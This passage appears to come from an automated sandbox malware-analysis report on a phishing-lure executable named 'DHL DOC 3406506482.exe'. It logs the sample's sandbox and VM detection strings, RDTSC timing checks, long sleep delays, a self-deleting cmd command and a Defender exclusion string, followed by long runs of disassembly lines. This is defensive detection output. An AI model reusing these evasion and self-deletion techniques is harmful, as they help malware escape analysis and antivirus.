          Source: C:\Windows\SysWOW64\explorer.exeProcess created: /c del "C:\Users\user\Desktop\DHL DOC 3406506482.exe"
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 0.2.DHL DOC 3406506482.exe.27b13c4.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.248588915.0000000002791000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.248628674.00000000027CD000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: DHL DOC 3406506482.exe PID: 4824, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: DHL DOC 3406506482.exe, 00000000.00000002.248588915.0000000002791000.00000004.00000001.sdmp, DHL DOC 3406506482.exe, 00000000.00000002.248628674.00000000027CD000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: DHL DOC 3406506482.exe, 00000000.00000002.248588915.0000000002791000.00000004.00000001.sdmp, DHL DOC 3406506482.exe, 00000000.00000002.248628674.00000000027CD000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeRDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\explorer.exeRDTSC instruction interceptor: First address: 0000000002D79904 second address: 0000000002D7990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\explorer.exeRDTSC instruction interceptor: First address: 0000000002D79B7E second address: 0000000002D79B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exe TID: 2248Thread sleep time: -34821s >= -30000s
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exe TID: 2888Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 5020Thread sleep time: -36000s >= -30000s
          Source: C:\Windows\SysWOW64\explorer.exe TID: 4840Thread sleep time: -32000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeCode function: 1_2_00409AB0 rdtsc
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeThread delayed: delay time: 34821
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeThread delayed: delay time: 922337203685477
          Source: DHL DOC 3406506482.exe, 00000000.00000002.248628674.00000000027CD000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
          Source: explorer.exe, 00000002.00000000.294199166.000000000891C000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000002.00000000.278703842.0000000008AEA000.00000004.00000001.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: DHL DOC 3406506482.exe, 00000000.00000002.248628674.00000000027CD000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000002.00000000.279700736.000000000DC20000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000000.252879349.0000000003710000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: DHL DOC 3406506482.exe, 00000000.00000002.248628674.00000000027CD000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000002.00000000.279700736.000000000DC20000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Packages
          Source: explorer.exe, 00000002.00000000.377785658.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
          Source: explorer.exe, 00000002.00000000.276642485.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 00000002.00000000.253873142.00000000053C4000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 00000002.00000000.276642485.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
          Source: DHL DOC 3406506482.exe, 00000000.00000002.248628674.00000000027CD000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeCode function: 1_2_00409AB0 rdtsc
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\explorer.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A490AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A3F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A3F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A3F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A09080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A83884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A83884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A1849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A058EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04AC14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A86CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A86CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A86CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A9B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A9B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A9B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A9B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A9B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A9B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04AD8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A1B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A1B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A1B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A1B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A3002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A3002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A3002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A3002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A3002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A3BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04AD740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04AD740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04AD740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A86C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A86C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A86C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A86C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04AC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04AC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04AC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04AC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04AC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04AC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04AC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04AC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04AC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04AC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04AC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04AC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04AC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04AC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04AD4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04AD4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A87016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A87016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A87016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A2746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04AD1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04AC2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A3A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A20050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A20050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A9C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A9C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A335A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A361A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A361A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A869A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A31DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A31DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A31DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A2C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A32581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A32581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A32581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A32581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A3A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A02D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A02D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A02D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A02D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A02D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A32990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A3FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A3FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A0B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A0B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A0B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A941E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A1D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A1D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04AB8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A86DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A86DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A86DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A86DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A86DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A86DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A24120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A24120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A24120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A24120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A24120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A0AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A34D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A34D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A34D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04AD8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A3513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A3513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A8A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A09100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A09100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A09100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A0C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A0B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A0B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A2C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A2C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A2B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A2B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A43D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A83540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A27D50 mov eax, dword ptr fs:[00000030h]
